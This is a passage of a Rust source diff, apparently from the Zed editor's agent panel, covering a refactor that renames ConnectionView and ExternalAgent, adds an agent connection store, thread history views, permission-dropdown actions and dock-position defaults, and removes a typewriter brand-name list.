thread_store: Entity<ThreadStore>,
text_thread_store: Entity<assistant_text_thread::TextThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
+ connection_store: Entity<AgentConnectionStore>,
context_server_registry: Entity<ContextServerRegistry>,
configuration: Option<Entity<AgentConfiguration>>,
configuration_subscription: Option<Subscription>,
focus_handle: FocusHandle,
active_view: ActiveView,
previous_view: Option<ActiveView>,
- background_threads: HashMap<acp::SessionId, Entity<ConnectionView>>,
+ background_threads: HashMap<acp::SessionId, Entity<ConversationView>>,
new_thread_menu_handle: PopoverMenuHandle<ContextMenu>,
start_thread_in_menu_handle: PopoverMenuHandle<ContextMenu>,
agent_panel_menu_handle: PopoverMenuHandle<ContextMenu>,
@@ -642,7 +748,7 @@ pub struct AgentPanel {
zoomed: bool,
pending_serialization: Option<Task<Result<()>>>,
onboarding: Entity<AgentPanelOnboarding>,
- selected_agent: AgentType,
+ selected_agent_type: AgentType,
start_thread_in: StartThreadIn,
worktree_creation_status: Option<WorktreeCreationStatus>,
_thread_view_subscription: Option<Subscription>,
@@ -661,33 +767,32 @@ impl AgentPanel {
};
let width = self.width;
- let selected_agent = self.selected_agent.clone();
+ let selected_agent_type = self.selected_agent_type.clone();
let start_thread_in = Some(self.start_thread_in);
let last_active_thread = self.active_agent_thread(cx).map(|thread| {
let thread = thread.read(cx);
let title = thread.title();
+ let work_dirs = thread.work_dirs().cloned();
SerializedActiveThread {
session_id: thread.session_id().0.to_string(),
- agent_type: self.selected_agent.clone(),
- title: if title.as_ref() != DEFAULT_THREAD_TITLE {
- Some(title.to_string())
- } else {
- None
- },
- cwd: None,
+ agent_type: self.selected_agent_type.clone(),
+ title: title.map(|t| t.to_string()),
+ work_dirs: work_dirs.map(|dirs| dirs.serialize()),
}
});
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = Some(cx.background_spawn(async move {
save_serialized_panel(
workspace_id,
SerializedAgentPanel {
width,
- selected_agent: Some(selected_agent),
+ selected_agent: Some(selected_agent_type),
last_active_thread,
start_thread_in,
},
+ kvp,
)
.await?;
anyhow::Ok(())
@@ -700,6 +805,7 @@ impl AgentPanel {
mut cx: AsyncWindowContext,
) -> Task<Result<Entity<Self>>> {
let prompt_store = cx.update(|_window, cx| PromptStore::global(cx));
+ let kvp = cx.update(|_window, cx| KeyValueStore::global(cx)).ok();
cx.spawn(async move |cx| {
let prompt_store = match prompt_store {
Ok(prompt_store) => prompt_store.await.ok(),
@@ -712,9 +818,11 @@ impl AgentPanel {
let serialized_panel = cx
.background_spawn(async move {
- workspace_id
- .and_then(read_serialized_panel)
- .or_else(read_legacy_serialized_panel)
+ kvp.and_then(|kvp| {
+ workspace_id
+ .and_then(|id| read_serialized_panel(id, &kvp))
+ .or_else(|| read_legacy_serialized_panel(&kvp))
+ })
})
.await;
@@ -733,7 +841,7 @@ impl AgentPanel {
let last_active_thread = if let Some(thread_info) = serialized_panel
.as_ref()
- .and_then(|p| p.last_active_thread.clone())
+ .and_then(|p| p.last_active_thread.as_ref())
{
if thread_info.agent_type.is_native() {
let session_id = acp::SessionId::new(thread_info.session_id.clone());
@@ -770,7 +878,7 @@ impl AgentPanel {
panel.update(cx, |panel, cx| {
panel.width = serialized_panel.width.map(|w| w.round());
if let Some(selected_agent) = serialized_panel.selected_agent.clone() {
- panel.selected_agent = selected_agent;
+ panel.selected_agent_type = selected_agent;
}
if let Some(start_thread_in) = serialized_panel.start_thread_in {
let is_worktree_flag_enabled =
@@ -798,8 +906,18 @@ impl AgentPanel {
if let Some(thread_info) = last_active_thread {
let agent_type = thread_info.agent_type.clone();
panel.update(cx, |panel, cx| {
- panel.selected_agent = agent_type;
- panel.load_agent_thread_inner(thread_info.session_id.into(), thread_info.cwd, thread_info.title.map(SharedString::from), false, window, cx);
+ panel.selected_agent_type = agent_type;
+ if let Some(agent) = panel.selected_agent() {
+ panel.load_agent_thread(
+ agent,
+ thread_info.session_id.clone().into(),
+ thread_info.work_dirs.as_ref().map(|dirs| PathList::deserialize(dirs)),
+ thread_info.title.as_ref().map(|t| t.clone().into()),
+ false,
+ window,
+ cx,
+ );
+ }
});
}
panel
@@ -828,25 +946,9 @@ impl AgentPanel {
cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx));
let thread_store = ThreadStore::global(cx);
- let acp_history = cx.new(|cx| ThreadHistory::new(None, window, cx));
let text_thread_history =
cx.new(|cx| TextThreadHistory::new(text_thread_store.clone(), window, cx));
- cx.subscribe_in(
- &acp_history,
- window,
- |this, _, event, window, cx| match event {
- ThreadHistoryEvent::Open(thread) => {
- this.load_agent_thread(
- thread.session_id.clone(),
- thread.cwd.clone(),
- thread.title.clone(),
- window,
- cx,
- );
- }
- },
- )
- .detach();
+
cx.subscribe_in(
&text_thread_history,
window,
@@ -866,15 +968,18 @@ impl AgentPanel {
window.defer(cx, move |window, cx| {
let panel = weak_panel.clone();
let agent_navigation_menu =
- ContextMenu::build_persistent(window, cx, move |mut menu, _window, cx| {
+ ContextMenu::build_persistent(window, cx, move |mut menu, window, cx| {
if let Some(panel) = panel.upgrade() {
- if let Some(kind) = panel.read(cx).history_kind_for_selected_agent(cx) {
- menu =
- Self::populate_recently_updated_menu_section(menu, panel, kind, cx);
- let view_all_label = match kind {
- HistoryKind::AgentThreads => "View All",
- HistoryKind::TextThreads => "View All Text Threads",
+ if let Some(history) = panel
+ .update(cx, |panel, cx| panel.history_for_selected_agent(window, cx))
+ {
+ let view_all_label = match history {
+ History::AgentThreads { .. } => "View All",
+ History::TextThreads => "View All Text Threads",
};
+ menu = Self::populate_recently_updated_menu_section(
+ menu, panel, history, cx,
+ );
menu = menu.action(view_all_label, Box::new(OpenHistory));
}
}
@@ -940,6 +1045,17 @@ impl AgentPanel {
None
};
+ let connection_store = cx.new(|cx| {
+ let mut store = AgentConnectionStore::new(project.clone(), cx);
+ // Register the native agent right away, so that it is available for
+ // the inline assistant etc.
+ store.request_connection(
+ Agent::NativeAgent,
+ Agent::NativeAgent.server(fs.clone(), thread_store.clone()),
+ cx,
+ );
+ store
+ });
let mut panel = Self {
workspace_id,
active_view,
@@ -950,6 +1066,7 @@ impl AgentPanel {
language_registry,
text_thread_store,
prompt_store,
+ connection_store,
configuration: None,
configuration_subscription: None,
focus_handle: cx.focus_handle(),
@@ -967,10 +1084,9 @@ impl AgentPanel {
zoomed: false,
pending_serialization: None,
onboarding,
- acp_history,
text_thread_history,
thread_store,
- selected_agent: AgentType::default(),
+ selected_agent_type: AgentType::default(),
start_thread_in: StartThreadIn::default(),
worktree_creation_status: None,
_thread_view_subscription: None,
@@ -978,7 +1094,7 @@ impl AgentPanel {
_worktree_creation_task: None,
show_trust_workspace_message: false,
last_configuration_error_telemetry: None,
- on_boarding_upsell_dismissed: AtomicBool::new(OnboardingUpsell::dismissed()),
+ on_boarding_upsell_dismissed: AtomicBool::new(OnboardingUpsell::dismissed(cx)),
_active_view_observation: None,
};
@@ -1025,22 +1141,22 @@ impl AgentPanel {
&self.thread_store
}
- pub fn history(&self) -> &Entity<ThreadHistory> {
- &self.acp_history
+ pub fn connection_store(&self) -> &Entity<AgentConnectionStore> {
+ &self.connection_store
}
pub fn open_thread(
&mut self,
session_id: acp::SessionId,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
title: Option<SharedString>,
window: &mut Window,
cx: &mut Context<Self>,
) {
self.external_thread(
- Some(crate::ExternalAgent::NativeAgent),
+ Some(crate::Agent::NativeAgent),
Some(session_id),
- cwd,
+ work_dirs,
title,
None,
true,
@@ -1070,16 +1186,6 @@ impl AgentPanel {
.unwrap_or(false)
}
- pub fn active_connection_view(&self) -> Option<&Entity<ConnectionView>> {
- match &self.active_view {
- ActiveView::AgentThread { server_view, .. } => Some(server_view),
- ActiveView::Uninitialized
- | ActiveView::TextThread { .. }
- | ActiveView::History { .. }
- | ActiveView::Configuration => None,
- }
- }
-
pub fn new_thread(&mut self, _action: &NewThread, window: &mut Window, cx: &mut Context<Self>) {
self.new_agent_thread(AgentType::NativeAgent, window, cx);
}
@@ -1090,27 +1196,42 @@ impl AgentPanel {
window: &mut Window,
cx: &mut Context<Self>,
) {
- let Some(thread) = self
- .acp_history
+ let session_id = action.from_session_id.clone();
+
+ let Some(history) = self
+ .connection_store
.read(cx)
- .session_for_id(&action.from_session_id)
+ .entry(&Agent::NativeAgent)
+ .and_then(|e| e.read(cx).history().cloned())
else {
+ debug_panic!("Native agent is not registered");
return;
};
- self.external_thread(
- Some(ExternalAgent::NativeAgent),
- None,
- None,
- None,
- Some(AgentInitialContent::ThreadSummary {
- session_id: thread.session_id,
- title: thread.title,
- }),
- true,
- window,
- cx,
- );
+ cx.spawn_in(window, async move |this, cx| {
+ this.update_in(cx, |this, window, cx| {
+ let thread = history
+ .read(cx)
+ .session_for_id(&session_id)
+ .context("Session not found")?;
+
+ this.external_thread(
+ Some(Agent::NativeAgent),
+ None,
+ None,
+ None,
+ Some(AgentInitialContent::ThreadSummary {
+ session_id: thread.session_id,
+ title: thread.title,
+ }),
+ true,
+ window,
+ cx,
+ );
+ anyhow::Ok(())
+ })
+ })
+ .detach_and_log_err(cx);
}
fn new_text_thread(&mut self, window: &mut Window, cx: &mut Context<Self>) {
@@ -1137,8 +1258,8 @@ impl AgentPanel {
editor
});
- if self.selected_agent != AgentType::TextThread {
- self.selected_agent = AgentType::TextThread;
+ if self.selected_agent_type != AgentType::TextThread {
+ self.selected_agent_type = AgentType::TextThread;
self.serialize(cx);
}
@@ -1158,9 +1279,9 @@ impl AgentPanel {
fn external_thread(
&mut self,
- agent_choice: Option<crate::ExternalAgent>,
+ agent_choice: Option<crate::Agent>,
resume_session_id: Option<acp::SessionId>,
- cwd: Option<PathBuf>,
+ work_dirs: Option<PathList>,
title: Option<SharedString>,
initial_content: Option<AgentInitialContent>,
focus: bool,
@@ -1176,20 +1297,21 @@ impl AgentPanel {
#[derive(Serialize, Deserialize)]
struct LastUsedExternalAgent {
- agent: crate::ExternalAgent,
+ agent: crate::Agent,
}
let thread_store = self.thread_store.clone();
+ let kvp = KeyValueStore::global(cx);
if let Some(agent) = agent_choice {
cx.background_spawn({
let agent = agent.clone();
+ let kvp = kvp;
async move {
if let Some(serialized) =
serde_json::to_string(&LastUsedExternalAgent { agent }).log_err()
{
- KEY_VALUE_STORE
- .write_kvp(LAST_USED_EXTERNAL_AGENT_KEY.to_string(), serialized)
+ kvp.write_kvp(LAST_USED_EXTERNAL_AGENT_KEY.to_string(), serialized)
.await
.log_err();
}
@@ -1198,10 +1320,10 @@ impl AgentPanel {
.detach();
let server = agent.server(fs, thread_store);
- self.create_external_thread(
+ self.create_agent_thread(
server,
resume_session_id,
- cwd,
+ work_dirs,
title,
initial_content,
workspace,
@@ -1214,27 +1336,25 @@ impl AgentPanel {
} else {
cx.spawn_in(window, async move |this, cx| {
let ext_agent = if is_via_collab {
- ExternalAgent::NativeAgent
+ Agent::NativeAgent
} else {
- cx.background_spawn(async move {
- KEY_VALUE_STORE.read_kvp(LAST_USED_EXTERNAL_AGENT_KEY)
- })
- .await
- .log_err()
- .flatten()
- .and_then(|value| {
- serde_json::from_str::<LastUsedExternalAgent>(&value).log_err()
- })
- .map(|agent| agent.agent)
- .unwrap_or(ExternalAgent::NativeAgent)
+ cx.background_spawn(async move { kvp.read_kvp(LAST_USED_EXTERNAL_AGENT_KEY) })
+ .await
+ .log_err()
+ .flatten()
+ .and_then(|value| {
+ serde_json::from_str::<LastUsedExternalAgent>(&value).log_err()
+ })
+ .map(|agent| agent.agent)
+ .unwrap_or(Agent::NativeAgent)
};
let server = ext_agent.server(fs, thread_store);
this.update_in(cx, |agent_panel, window, cx| {
- agent_panel.create_external_thread(
+ agent_panel.create_agent_thread(
server,
resume_session_id,
- cwd,
+ work_dirs,
title,
initial_content,
workspace,
@@ -1277,11 +1397,11 @@ impl AgentPanel {
}
fn expand_message_editor(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- let Some(thread_view) = self.active_connection_view() else {
+ let Some(conversation_view) = self.active_conversation_view() else {
return;
};
- let Some(active_thread) = thread_view.read(cx).active_thread().cloned() else {
+ let Some(active_thread) = conversation_view.read(cx).active_thread().cloned() else {
return;
};
@@ -1291,27 +1411,94 @@ impl AgentPanel {
})
}
- fn history_kind_for_selected_agent(&self, cx: &App) -> Option<HistoryKind> {
- match self.selected_agent {
- AgentType::NativeAgent => Some(HistoryKind::AgentThreads),
- AgentType::TextThread => Some(HistoryKind::TextThreads),
- AgentType::Custom { .. } => {
- if self.acp_history.read(cx).has_session_list() {
- Some(HistoryKind::AgentThreads)
- } else {
- None
- }
+ fn has_history_for_selected_agent(&self, cx: &App) -> bool {
+ match &self.selected_agent_type {
+ AgentType::TextThread | AgentType::NativeAgent => true,
+ AgentType::Custom { id } => {
+ let agent = Agent::Custom { id: id.clone() };
+ self.connection_store
+ .read(cx)
+ .entry(&agent)
+ .map_or(false, |entry| entry.read(cx).history().is_some())
+ }
+ }
+ }
+
+ fn history_for_selected_agent(
+ &self,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Option<History> {
+ match &self.selected_agent_type {
+ AgentType::TextThread => Some(History::TextThreads),
+ AgentType::NativeAgent => {
+ let history = self
+ .connection_store
+ .read(cx)
+ .entry(&Agent::NativeAgent)?
+ .read(cx)
+ .history()?
+ .clone();
+
+ Some(History::AgentThreads {
+ view: self.create_thread_history_view(Agent::NativeAgent, history, window, cx),
+ })
+ }
+ AgentType::Custom { id, .. } => {
+ let agent = Agent::Custom { id: id.clone() };
+ let history = self
+ .connection_store
+ .read(cx)
+ .entry(&agent)?
+ .read(cx)
+ .history()?
+ .clone();
+ Some(History::AgentThreads {
+ view: self.create_thread_history_view(agent, history, window, cx),
+ })
}
}
}
+ fn create_thread_history_view(
+ &self,
+ agent: Agent,
+ history: Entity<ThreadHistory>,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Entity<ThreadHistoryView> {
+ let view = cx.new(|cx| ThreadHistoryView::new(history.clone(), window, cx));
+ cx.subscribe_in(
+ &view,
+ window,
+ move |this, _, event, window, cx| match event {
+ ThreadHistoryViewEvent::Open(thread) => {
+ this.load_agent_thread(
+ agent.clone(),
+ thread.session_id.clone(),
+ thread.work_dirs.clone(),
+ thread.title.clone(),
+ true,
+ window,
+ cx,
+ );
+ }
+ },
+ )
+ .detach();
+ view
+ }
+
fn open_history(&mut self, window: &mut Window, cx: &mut Context<Self>) {
- let Some(kind) = self.history_kind_for_selected_agent(cx) else {
+ let Some(history) = self.history_for_selected_agent(window, cx) else {
return;
};
- if let ActiveView::History { kind: active_kind } = self.active_view {
- if active_kind == kind {
+ if let ActiveView::History {
+ history: active_history,
+ } = &self.active_view
+ {
+ if active_history == &history {
if let Some(previous_view) = self.previous_view.take() {
self.set_active_view(previous_view, true, window, cx);
}
@@ -403,6 +403,22 @@ impl AgentRegistryPage {
})
});
+ let website_button = agent.website().map(|website| {
+ let website = website.clone();
+ let website_for_click = website.clone();
+ IconButton::new(
+ SharedString::from(format!("agent-website-{}", agent.id())),
+ IconName::Link,
+ )
+ .icon_size(IconSize::Small)
+ .tooltip(move |_, cx| {
+ Tooltip::with_meta("Visit Agent Website", None, website.clone(), cx)
+ })
+ .on_click(move |_, _, cx| {
+ cx.open_url(&website_for_click);
+ })
+ });
+
AgentRegistryCard::new()
.child(
h_flex()
@@ -441,7 +457,8 @@ impl AgentRegistryPage {
.color(Color::Muted)
.truncate(),
)
- .when_some(repository_button, |this, button| this.child(button)),
+ .when_some(repository_button, |this, button| this.child(button))
+ .when_some(website_button, |this, button| this.child(button)),
),
)
}
@@ -467,10 +484,11 @@ impl AgentRegistryPage {
let agent_id = agent.id().to_string();
Button::new(button_id, "Install")
.style(ButtonStyle::Tinted(ui::TintColor::Accent))
- .icon(IconName::Download)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
let agent_id = agent_id.clone();
update_settings_file(fs.clone(), cx, move |settings, _| {
@@ -541,9 +559,11 @@ impl Render for AgentRegistryPage {
Button::new("learn-more", "Learn More")
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::ArrowUpRight)
- .icon_color(Color::Muted)
- .icon_size(IconSize::Small)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
cx.open_url(&zed_urls::acp_registry_blog(cx))
}),
@@ -1,4 +1,5 @@
mod agent_configuration;
+pub(crate) mod agent_connection_store;
mod agent_diff;
mod agent_model_selector;
mod agent_panel;
@@ -7,9 +8,9 @@ mod branch_names;
mod buffer_codegen;
mod completion_provider;
mod config_options;
-pub(crate) mod connection_view;
mod context;
mod context_server_configuration;
+pub(crate) mod conversation_view;
mod entry_view_state;
mod external_source_prompt;
mod favorite_models;
@@ -31,6 +32,9 @@ pub mod test_support;
mod text_thread_editor;
mod text_thread_history;
mod thread_history;
+mod thread_history_view;
+pub mod thread_metadata_store;
+pub mod threads_archive_view;
mod ui;
use std::rc::Rc;
@@ -43,7 +47,7 @@ use client::Client;
use command_palette_hooks::CommandPaletteFilter;
use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _};
use fs::Fs;
-use gpui::{Action, App, Context, Entity, SharedString, Window, actions};
+use gpui::{Action, App, Context, Entity, SharedString, UpdateGlobal, Window, actions};
use language::{
LanguageRegistry,
language_settings::{AllLanguageSettings, EditPredictionProvider},
@@ -51,11 +55,11 @@ use language::{
use language_model::{
ConfiguredModel, LanguageModelId, LanguageModelProviderId, LanguageModelRegistry,
};
-use project::DisableAiSettings;
+use project::{AgentId, DisableAiSettings};
use prompt_store::PromptBuilder;
use schemars::JsonSchema;
use serde::{Deserialize, Serialize};
-use settings::{LanguageModelSelection, Settings as _, SettingsStore};
+use settings::{DockPosition, DockSide, LanguageModelSelection, Settings as _, SettingsStore};
use std::any::TypeId;
use workspace::Workspace;
@@ -66,15 +70,18 @@ pub use crate::agent_panel::{
use crate::agent_registry_ui::AgentRegistryPage;
pub use crate::inline_assistant::InlineAssistant;
pub use agent_diff::{AgentDiffPane, AgentDiffToolbar};
-pub(crate) use connection_view::ConnectionView;
+pub(crate) use conversation_view::ConversationView;
pub use external_source_prompt::ExternalSourcePrompt;
pub(crate) use mode_selector::ModeSelector;
pub(crate) use model_selector::ModelSelector;
pub(crate) use model_selector_popover::ModelSelectorPopover;
pub use text_thread_editor::{AgentPanelDelegate, TextThreadEditor};
-pub(crate) use thread_history::*;
+pub(crate) use thread_history::ThreadHistory;
+pub(crate) use thread_history_view::*;
use zed_actions;
+pub const DEFAULT_THREAD_TITLE: &str = "New Thread";
+
actions!(
agent,
[
@@ -82,8 +89,8 @@ actions!(
NewTextThread,
/// Toggles the menu to create new agent threads.
ToggleNewThreadMenu,
- /// Toggles the selector for choosing where new threads start (current project or new worktree).
- ToggleStartThreadInSelector,
+ /// Cycles through the options for where new threads start (current project or new worktree).
+ CycleStartThreadIn,
/// Toggles the navigation menu for switching between threads and views.
ToggleNavigationMenu,
/// Toggles the options menu for agent settings and preferences.
@@ -189,6 +196,29 @@ pub struct AuthorizeToolCall {
pub option_kind: String,
}
+/// Action to select a permission granularity option from the dropdown.
+/// This updates the selected granularity without triggering authorization.
+#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+#[action(namespace = agent)]
+#[serde(deny_unknown_fields)]
+pub struct SelectPermissionGranularity {
+ /// The tool call ID for which to select the granularity.
+ pub tool_call_id: String,
+ /// The index of the selected granularity option.
+ pub index: usize,
+}
+
+/// Action to toggle a command pattern checkbox in the permission dropdown.
+#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+#[action(namespace = agent)]
+#[serde(deny_unknown_fields)]
+pub struct ToggleCommandPattern {
+ /// The tool call ID for which to toggle the pattern.
+ pub tool_call_id: String,
+ /// The index of the command pattern to toggle.
+ pub pattern_index: usize,
+}
+
/// Creates a new conversation thread, optionally based on an existing thread.
#[derive(Default, Clone, PartialEq, Deserialize, JsonSchema, Action)]
#[action(namespace = agent)]
@@ -201,7 +231,7 @@ pub struct NewThread;
#[serde(deny_unknown_fields)]
pub struct NewExternalAgentThread {
/// Which agent to use for the conversation.
- agent: Option<ExternalAgent>,
+ agent: Option<Agent>,
}
#[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
@@ -212,71 +242,24 @@ pub struct NewNativeAgentThreadFromSummary {
}
// TODO unify this with AgentType
-#[derive(Debug, Clone, PartialEq, Serialize, JsonSchema)]
+#[derive(Debug, Clone, PartialEq, Eq, Hash, Serialize, Deserialize, JsonSchema)]
#[serde(rename_all = "snake_case")]
-pub enum ExternalAgent {
+pub enum Agent {
NativeAgent,
- Custom { name: SharedString },
+ Custom {
+ #[serde(rename = "name")]
+ id: AgentId,
+ },
}
-// Custom impl handles legacy variant names from before the built-in agents were moved to
-// the registry: "claude_code" -> Custom { name: "claude-acp" }, "codex" -> Custom { name:
-// "codex-acp" }, "gemini" -> Custom { name: "gemini" }.
-// Can be removed at some point in the future and go back to #[derive(Deserialize)].
-impl<'de> serde::Deserialize<'de> for ExternalAgent {
- fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
- where
- D: serde::Deserializer<'de>,
- {
- use project::agent_server_store::{CLAUDE_AGENT_NAME, CODEX_NAME, GEMINI_NAME};
-
- let value = serde_json::Value::deserialize(deserializer)?;
-
- if let Some(s) = value.as_str() {
- return match s {
- "native_agent" => Ok(Self::NativeAgent),
- "claude_code" | "claude_agent" => Ok(Self::Custom {
- name: CLAUDE_AGENT_NAME.into(),
- }),
- "codex" => Ok(Self::Custom {
- name: CODEX_NAME.into(),
- }),
- "gemini" => Ok(Self::Custom {
- name: GEMINI_NAME.into(),
- }),
- other => Err(serde::de::Error::unknown_variant(
- other,
- &[
- "native_agent",
- "custom",
- "claude_agent",
- "claude_code",
- "codex",
- "gemini",
- ],
- )),
- };
- }
-
- if let Some(obj) = value.as_object() {
- if let Some(inner) = obj.get("custom") {
- #[derive(serde::Deserialize)]
- struct CustomFields {
- name: SharedString,
- }
- let fields: CustomFields =
- serde_json::from_value(inner.clone()).map_err(serde::de::Error::custom)?;
- return Ok(Self::Custom { name: fields.name });
- }
+impl Agent {
+ pub fn id(&self) -> AgentId {
+ match self {
+ Self::NativeAgent => agent::ZED_AGENT_ID.clone(),
+ Self::Custom { id } => id.clone(),
}
-
- Err(serde::de::Error::custom(
- "expected a string variant or {\"custom\": {\"name\": ...}}",
- ))
}
-}
-impl ExternalAgent {
pub fn server(
&self,
fs: Arc<dyn fs::Fs>,
@@ -284,7 +267,9 @@ impl ExternalAgent {
) -> Rc<dyn agent_servers::AgentServer> {
match self {
Self::NativeAgent => Rc::new(agent::NativeAgentServer::new(fs, thread_store)),
- Self::Custom { name } => Rc::new(agent_servers::CustomAgentServer::new(name.clone())),
+ Self::Custom { id: name } => {
+ Rc::new(agent_servers::CustomAgentServer::new(name.clone()))
+ }
}
}
}
@@ -373,6 +358,7 @@ pub fn init(
agent_panel::init(cx);
context_server_configuration::init(language_registry.clone(), fs.clone(), cx);
TextThreadEditor::init(cx);
+ thread_metadata_store::init(cx);
register_slash_commands(cx);
inline_assistant::init(fs.clone(), prompt_builder.clone(), cx);
@@ -429,6 +415,31 @@ pub fn init(
update_command_palette_filter(cx);
})
.detach();
+
+ cx.observe_flag::<AgentV2FeatureFlag, _>(|is_enabled, cx| {
+ SettingsStore::update_global(cx, |store, cx| {
+ store.update_default_settings(cx, |defaults| {
+ if is_enabled {
+ defaults.agent.get_or_insert_default().dock = Some(DockPosition::Left);
+ defaults.project_panel.get_or_insert_default().dock = Some(DockSide::Right);
+ defaults.outline_panel.get_or_insert_default().dock = Some(DockSide::Right);
+ defaults.collaboration_panel.get_or_insert_default().dock =
+ Some(DockPosition::Right);
+ defaults.git_panel.get_or_insert_default().dock = Some(DockPosition::Right);
+ defaults.notification_panel.get_or_insert_default().button = Some(false);
+ } else {
+ defaults.agent.get_or_insert_default().dock = Some(DockPosition::Right);
+ defaults.project_panel.get_or_insert_default().dock = Some(DockSide::Left);
+ defaults.outline_panel.get_or_insert_default().dock = Some(DockSide::Left);
+ defaults.collaboration_panel.get_or_insert_default().dock =
+ Some(DockPosition::Left);
+ defaults.git_panel.get_or_insert_default().dock = Some(DockPosition::Left);
+ defaults.notification_panel.get_or_insert_default().button = Some(true);
+ }
+ });
+ });
+ })
+ .detach();
}
fn update_command_palette_filter(cx: &mut App) {
@@ -651,6 +662,7 @@ mod tests {
message_editor_min_lines: 1,
tool_permissions: Default::default(),
show_turn_stats: false,
+ new_thread_location: Default::default(),
};
cx.update(|cx| {
@@ -744,39 +756,15 @@ mod tests {
}
#[test]
- fn test_deserialize_legacy_external_agent_variants() {
- use project::agent_server_store::{CLAUDE_AGENT_NAME, CODEX_NAME, GEMINI_NAME};
-
- assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""claude_code""#).unwrap(),
- ExternalAgent::Custom {
- name: CLAUDE_AGENT_NAME.into(),
- },
- );
- assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""codex""#).unwrap(),
- ExternalAgent::Custom {
- name: CODEX_NAME.into(),
- },
- );
- assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""gemini""#).unwrap(),
- ExternalAgent::Custom {
- name: GEMINI_NAME.into(),
- },
- );
- }
-
- #[test]
- fn test_deserialize_current_external_agent_variants() {
+ fn test_deserialize_external_agent_variants() {
assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#""native_agent""#).unwrap(),
- ExternalAgent::NativeAgent,
+ serde_json::from_str::<Agent>(r#""native_agent""#).unwrap(),
+ Agent::NativeAgent,
);
assert_eq!(
- serde_json::from_str::<ExternalAgent>(r#"{"custom":{"name":"my-agent"}}"#).unwrap(),
- ExternalAgent::Custom {
- name: "my-agent".into(),
+ serde_json::from_str::<Agent>(r#"{"custom":{"name":"my-agent"}}"#).unwrap(),
+ Agent::Custom {
+ id: "my-agent".into(),
},
);
}
@@ -1,710 +1,77 @@
use collections::HashSet;
use rand::Rng;
-/// Names of historical typewriter brands, for use in auto-generated branch names.
-/// (Hyphens and parens have been dropped so that the branch names are one-word.)
-///
-/// Thanks to https://typewriterdatabase.com/alph.0.brands for the names!
-const TYPEWRITER_NAMES: &[&str] = &[
- "abeille",
- "acme",
- "addo",
- "adler",
- "adlerette",
- "adlerita",
- "admiral",
- "agamli",
- "agar",
- "agidel",
- "agil",
- "aguia",
- "aguila",
- "ahram",
- "aigle",
- "ajax",
- "aktiv",
- "ala",
- "alba",
- "albus",
- "alexander",
- "alexis",
- "alfa",
- "allen",
- "alonso",
- "alpina",
- "amata",
- "amaya",
- "amka",
- "anavi",
- "anderson",
- "andina",
- "antares",
- "apex",
- "apsco",
- "aquila",
- "archo",
- "ardita",
- "argyle",
- "aristocrat",
- "aristokrat",
- "arlington",
- "armstrong",
- "arpha",
- "artus",
- "astoria",
- "atlantia",
- "atlantic",
- "atlas",
- "augusta",
- "aurora",
- "austro",
- "automatic",
- "avanti",
- "avona",
- "azzurra",
- "bajnok",
- "baldwin",
- "balkan",
- "baltica",
- "baltimore",
- "barlock",
- "barr",
- "barrat",
- "bartholomew",
- "bashkiriya",
- "bavaria",
- "beaucourt",
- "beko",
- "belka",
- "bennett",
- "bennington",
- "berni",
- "bianca",
- "bijou",
- "bing",
- "bisei",
- "biser",
- "bluebird",
- "bolida",
- "borgo",
- "boston",
- "boyce",
- "bradford",
- "brandenburg",
- "brigitte",
- "briton",
- "brooks",
- "brosette",
- "buddy",
- "burns",
- "burroughs",
- "byron",
- "calanda",
- "caligraph",
- "cappel",
- "cardinal",
- "carissima",
- "carlem",
- "carlton",
- "carmen",
- "cawena",
- "cella",
- "celtic",
- "century",
- "champignon",
- "cherryland",
- "chevron",
- "chicago",
- "cicero",
- "cifra",
- "citizen",
- "claudia",
- "cleveland",
- "clover",
- "coffman",
- "cole",
- "columbia",
- "commercial",
- "companion",
- "concentra",
- "concord",
- "concordia",
- "conover",
- "constanta",
- "consul",
- "conta",
- "contenta",
- "contimat",
- "contina",
- "continento",
- "cornelia",
- "coronado",
- "cosmopolita",
- "courier",
- "craftamatic",
- "crandall",
- "crown",
- "culema",
- "dactyle",
- "dankers",
- "dart",
- "daugherty",
- "davis",
- "dayton",
- "dea",
- "delmar",
- "densmore",
- "depantio",
- "diadema",
- "dial",
- "diamant",
- "diana",
- "dictatype",
- "diplomat",
- "diskret",
- "dolfus",
- "dollar",
- "domus",
- "drake",
- "draper",
- "duplex",
- "durabel",
- "dynacord",
- "eagle",
- "eclipse",
- "edelmann",
- "edelweiss",
- "edison",
- "edita",
- "edland",
- "efka",
- "eldorado",
- "electa",
- "electromatic",
- "elektro",
- "elgin",
- "elliot",
- "emerson",
- "emka",
- "emona",
- "empire",
- "engadine",
- "engler",
- "erfurt",
- "erika",
- "esko",
- "essex",
- "eureka",
- "europa",
- "everest",
- "everlux",
- "excelsior",
- "express",
- "fabers",
- "facit",
- "fairbanks",
- "faktotum",
- "famos",
- "federal",
- "felio",
- "fidat",
- "filius",
- "fips",
- "fish",
- "fitch",
- "fleet",
- "florida",
- "flott",
- "flyer",
- "flying",
- "fontana",
- "ford",
- "forto",
- "fortuna",
- "fox",
- "framo",
- "franconia",
- "franklin",
- "friden",
- "frolio",
- "furstenberg",
- "galesburg",
- "galiette",
- "gallia",
- "garbell",
- "gardner",
- "geka",
- "generation",
- "genia",
- "geniatus",
- "gerda",
- "gisela",
- "glashutte",
- "gloria",
- "godrej",
- "gossen",
